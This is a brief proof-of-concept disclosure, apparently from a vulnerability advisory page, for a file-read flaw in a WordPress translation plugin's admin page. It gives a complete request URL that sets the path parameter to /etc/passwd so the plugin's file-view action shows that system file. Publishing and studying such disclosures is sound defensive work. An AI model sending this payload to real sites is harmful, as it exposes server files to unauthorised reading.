Proof of Concept
The following url should yield the contents of (/etc/passwd) where the path parameter was expecting a GetText file but instead receives the payload, and the contents of said file can be viewed under the source tab or the (file-view) functionality under the action parameter. /wp-admin/admin.php?path=%2Fetc%2Fpasswd&bundle=twentynineteen&domain=twentynineteen&page=loco-theme&action=file-view

First seen on:

Share This: